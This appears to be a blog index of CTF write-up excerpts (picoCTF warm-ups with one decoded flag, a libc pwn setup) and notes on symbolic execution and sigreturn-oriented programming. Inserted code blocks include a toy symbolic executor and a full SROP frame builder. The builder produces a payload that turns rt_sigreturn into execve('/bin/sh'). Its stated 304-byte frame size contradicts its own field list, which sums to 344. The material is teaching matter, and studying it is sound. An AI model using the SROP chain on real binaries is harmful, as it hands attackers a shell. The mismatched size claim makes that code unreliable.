whats a net cat
what's a net cat?
Connecting
Magikarp Ground Mission
Magikarp Ground Mission
Log in to the server with the password the challenge gives you
Piece the flag together from the clues
wave a flag
Wave a flag
Inspect the file
$ file ./warm
It's an executable.
Run it
$ ./warm
Hello user! Pass me a -h to learn what I can do!
$ ./warm -h
obedient cat
Obedient Cat
$ cat flag
2019 Trendmicro CTF Wildcard 400
2019 Trendmicro CTF Wildcard 400
These are the notes I took while working through the 2019 Trendmicro CTF Wildcard 400 challenge; the references I used are listed at the end of the post.
Premise
You are a network security administrator for the medium sized business XYZcorp. You often use network flow data to uncover anomalous security events. This challenge provides some sample aggregated data on flows, and uses answers from the anomalous events to construct the flag.
Knowledge of network security or protocols is not required. This challenge requires data ...
Heres a Libc
Here's a LIBC
Given 3 files : vuln , libc.so.6 , Makefile
Environment set up
Use pwninit to set up the environment. We get ld-2.27.so.
Patch vuln to use ld-2.27.so.
Analyze vuln
file :
ELF 64-bit LSB executable
dynamically linked
interpreter ./ld-2.27.so
not stripped
checksec :
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./'
A loop in main :
00400896 b8 00 MOV EAX,0x0 ...
Information
Information
Given 1 file : cat.jpg
Analyze cat.jpg
Use exiftool to analyze cat.jpg :
exiftool ./cat.jpg
Found a string cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9 .
Base64 decode and get the Flag
echo "cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9" | base64 -d
python wrangling
Python Wrangling
Given 3 files : ende.py , flag.txt.en , pw.txt
Analyze ende.py :
import sys
import base64
from cryptography.fernet import Fernet
usage_msg = "Usage: "+ sys.argv[0] +" (-e/-d) [file]"
help_msg = usage_msg + "\n" +\
    "Examples:\n" +\
    "  To decrypt a file named 'pole.txt', do: " +\
    "'$ python "+ sys.a ...
Symbolic Execution
Symbolic Execution Note
finding bugs, symbolic execution, EXE
Bugs
Major source of security exploits.
Bugs ~ Exploits
Turning a bug into an exploit may be hard, but you should assume it is possible.
e.g., not every buffer overrun is an exploit, but it may be possible to exploit it.
Approaches To Finding Bugs
Verification : eliminate classes of bugs
Testing : known bugs
Fuzzing : unknown bugs
Symbolic Execution
Possible scenarios
Possible kinds of bugs:
Crash
Divide By Zero
Null Pointer Dereference
Array Out-Of-Bound
App Specific
Goal : Find Deep Bugs
Ide ...
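As an added illustration of the approach in this note (this is an example written for this page, not code from the note or from any real engine), here is a toy symbolic executor for programs over one integer input: values are linear expressions a*x + b, every comparison forks a path, each path keeps its constraints, and those are solved exactly over the integers. It finds the "deep" divide-by-zero in the constructed target program (only x == 111 reaches it, behind four checks) and returns the concrete input as a witness, which random testing would almost never hit. The names Sym, Executor and target are this example's own.

```python
"""Tiny symbolic executor over one integer input x: linear values, forking branches,
exact integer constraint solving (constructed example, not a real engine)."""
import operator

class Unsat(Exception): """No integer satisfies this path's constraints."""

NEG = {"<": ">=", "<=": ">", ">": "<=", ">=": "<"}                # other side of a branch
FLIP = {"<": ">", ">": "<", "<=": ">=", ">=": "<=", "==": "=="}   # after negating a
CMP = {"<": operator.lt, "<=": operator.le, ">": operator.gt, ">=": operator.ge,
       "==": operator.eq}

def solve(cons):
    """Return an integer x satisfying every (a, b, op), read as a*x + b op 0, or None."""
    lo, hi = float("-inf"), float("inf")
    for a, b, op in cons:
        if a == 0:                                   # concrete condition: just evaluate it
            if CMP[op](b, 0): continue
            return None
        t = -b
        if a < 0:                                    # normalise to a*x op t with a > 0
            a, t, op = -a, -t, FLIP[op]
        fl, ce = t // a, -((-t) // a)                # floor and ceil of t / a
        if op in ("<", "<="):
            hi = min(hi, ce - 1 if op == "<" else fl)
        elif op in (">", ">="):
            lo = max(lo, fl + 1 if op == ">" else ce)
        elif t % a:                                  # "==" needs an integer t / a
            return None
        else:
            lo, hi = max(lo, fl), min(hi, fl)
    if lo > hi:
        return None
    return lo if lo > float("-inf") else min(hi, 0)  # any integer in [lo, hi]

class Sym:
    """Symbolic linear value a*x + b; comparisons are routed to the executor."""
    def __init__(self, a, b, ex):
        self.a, self.b, self.ex = a, b, ex
    def _lin(self, o):
        return (o.a, o.b) if isinstance(o, Sym) else (0, int(o))
    def __add__(self, o):
        a, b = self._lin(o)
        return Sym(self.a + a, self.b + b, self.ex)
    def __neg__(self):
        return Sym(-self.a, -self.b, self.ex)
    __sub__ = lambda s, o: s + (-o)
    def __mul__(self, k):                            # only multiplication by a constant
        return Sym(self.a * int(k), self.b * int(k), self.ex)
    def _cmp(self, op, o):
        a, b = self._lin(o)
        return self.ex.branch(self.a - a, self.b - b, op)
    __lt__ = lambda s, o: s._cmp("<", o)
    __le__ = lambda s, o: s._cmp("<=", o)
    __gt__ = lambda s, o: s._cmp(">", o)
    __ge__ = lambda s, o: s._cmp(">=", o)
    def __rfloordiv__(self, n):                      # n // self with a symbolic divisor
        self.ex.check_divisor(self)
        return 0                                     # non-linear result: treat as opaque

class Executor:
    def __init__(self, program):
        self.program, self.bugs, self.paths, self.todo = program, [], 0, [[]]
    def branch(self, a, b, op):
        taken, other = (a, b, op), (a, b, NEG[op])
        if len(self.trace) < len(self.prefix):        # replaying a queued prefix
            outcome = self.prefix[len(self.trace)]
        else:
            can_t, can_f = (solve(self.cons + [c]) is not None for c in (taken, other))
            if not (can_t or can_f):
                raise Unsat
            if can_t and can_f:                       # fork: explore the False side later
                self.todo.append(self.trace + [False])
            outcome = can_t
        self.trace.append(outcome)
        self.cons.append(taken if outcome else other)
        return outcome
    def check_divisor(self, d):                       # can the divisor be 0 on this path?
        witness = solve(self.cons + [(d.a, d.b, "==")])
        if witness is not None:
            self.bugs.append(("divide-by-zero", witness))
    def run(self):                                    # returns (bugs, number of paths)
        while self.todo:
            self.prefix, self.trace, self.cons = self.todo.pop(), [], []
            try:
                self.program(Sym(1, 0, self))
                self.paths += 1
            except Unsat:
                pass
        return self.bugs, self.paths

def target(x):
    """Constructed test program: the crash needs four checks to line up (x == 111)."""
    if x <= 0 or x > 4096:
        return "rejected"
    header = x * 3 - 100
    if header < 200 or header >= 260:
        return "wrong size"
    return 1000 // (header - 233)   # divide by zero when header == 233, i.e. x == 111
```

`Executor(target).run()` explores all five feasible paths and reports `[("divide-by-zero", 111)]`. Real engines (KLEE, angr) differ in scale, not in shape: symbolic state, a path constraint per path, an SMT solver instead of this one-variable interval solver, and the path explosion that the note's "find deep bugs" goal has to fight.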
SROP
SROP Note
SROP Sigreturn-Oriented Programming
The signal mechanism
The signal mechanism (software interrupts) is a way for processes on UNIX-like systems to pass information to each other. For example, one process can send a signal to another through the kill system call.
Common steps of the signal mechanism:
Step 1 :
The kernel delivers a signal to a process; that process is temporarily suspended and enters kernel mode.
Step 2 :
The kernel saves some state for the process by pushing the following onto its stack:
All register values.
Signal information.
The address of the code that issues the sigreturn system call.
This part lives in the user process's address space.
It then jumps to the Signal Handler to handle the corresponding signal.
The Signal Frame differs between architectures.
Step 3 :
After the Signal Handler finishes, it returns ...
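As an added example (not from the note, and not pwntools' own code, though pwntools' SigreturnFrame does the same job), here is the x86-64 frame from Step 2 built from the attacker's side, which is what SROP does: because the kernel restores every register from the frame on rt_sigreturn without checking who wrote it, an attacker who controls the stack and can set rax = 15 before a syscall instruction gets full register control in one step. The field offsets follow the kernel's struct ucontext for x86-64 (uc_flags, uc_link, uc_stack, struct sigcontext, uc_sigmask); the gadget and buffer addresses in the usage section are hypothetical.

```python
"""x86-64 SROP frame builder (constructed example). The layout is the kernel's
struct ucontext as it sits below the return-address slot of rt_sigframe:
uc_flags, uc_link, uc_stack, struct sigcontext (registers), uc_sigmask."""
import struct

SYS_RT_SIGRETURN = 15
SYS_EXECVE = 59
USER_CS, USER_SS = 0x33, 0x2B           # x86-64 user-mode code / data selectors

# Fields in memory order with their struct codes; packed little-endian with no
# padding except the explicit 4 bytes after ss_flags, so offsets are prefix sums.
FIELDS = (
    [("uc_flags", "Q"), ("uc_link", "Q"),
     ("ss_sp", "Q"), ("ss_flags", "I"), ("_pad", "I"), ("ss_size", "Q")]
    + [(r, "Q") for r in ("r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
                          "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp",
                          "rip", "eflags")]
    + [("cs", "H"), ("gs", "H"), ("fs", "H"), ("ss", "H")]
    + [(f, "Q") for f in ("err", "trapno", "oldmask", "cr2", "fpstate")]
    + [("reserved%d" % i, "Q") for i in range(8)]
    + [("sigmask", "Q")]
)
FMT = "<" + "".join(code for _, code in FIELDS)
FRAME_SIZE = struct.calcsize(FMT)       # 304 bytes

def offset_of(name):
    """Byte offset of a field from the start of the frame."""
    idx = [n for n, _ in FIELDS].index(name)
    return struct.calcsize("<" + "".join(code for _, code in FIELDS[:idx]))

class SigreturnFrame:
    """Register state the kernel will load when rt_sigreturn consumes this frame."""
    def __init__(self):
        self.regs = {name: 0 for name, _ in FIELDS}
        self.regs["cs"], self.regs["ss"] = USER_CS, USER_SS   # valid user selectors
        # fpstate stays 0: a NULL pointer means there is no FP state to restore
    def __setitem__(self, name, value):
        if name not in self.regs:
            raise KeyError(name)
        self.regs[name] = value
    def __getitem__(self, name):
        return self.regs[name]
    def pack(self):
        return struct.pack(FMT, *(self.regs[name] for name, _ in FIELDS))

def execve_frame(syscall_gadget, binsh_addr, new_rsp):
    """Frame that turns rt_sigreturn into execve("/bin/sh", NULL, NULL)."""
    frame = SigreturnFrame()
    frame["rax"] = SYS_EXECVE
    frame["rdi"] = binsh_addr
    frame["rsi"] = 0
    frame["rdx"] = 0
    frame["rip"] = syscall_gadget       # the kernel "returns" to a syscall instruction
    frame["rsp"] = new_rsp              # some writable stack in case execve fails
    return frame

def srop_chain(pop_rax_ret, syscall_ret, frame):
    """Payload for an overwritten return address:
       pop rax; ret -> 15 -> syscall; ret -> frame (rsp points at the frame when
    rt_sigreturn runs). The attacker replaces the sigreturn trampoline of Step 2."""
    return struct.pack("<QQQ", pop_rax_ret, SYS_RT_SIGRETURN, syscall_ret) + frame.pack()

def parse_frame(blob):
    """Decode a frame back into a dict, i.e. what the kernel would read from it."""
    values = struct.unpack(FMT, blob[:FRAME_SIZE])
    return {name: value for (name, _), value in zip(FIELDS, values)}

if __name__ == "__main__":
    # Hypothetical addresses for a non-PIE binary; a real exploit finds them with a gadget finder
    frame = execve_frame(syscall_gadget=0x401234, binsh_addr=0x402000, new_rsp=0x402800)
    payload = srop_chain(pop_rax_ret=0x4011a1, syscall_ret=0x401234, frame=frame)
    print(len(payload), hex(parse_frame(payload[24:])["rip"]))
```

The payload is 24 bytes of chain followed by the 304-byte frame; rdi sits at offset 104, rax at 144, rsp at 160 and rip at 168 within the frame, which is what you would check against a debugger view of the stack before the syscall. If no pop rax gadget exists, the usual substitute is a read() whose return value (the byte count) becomes rax = 15, which is why SROP is often paired with a controlled read.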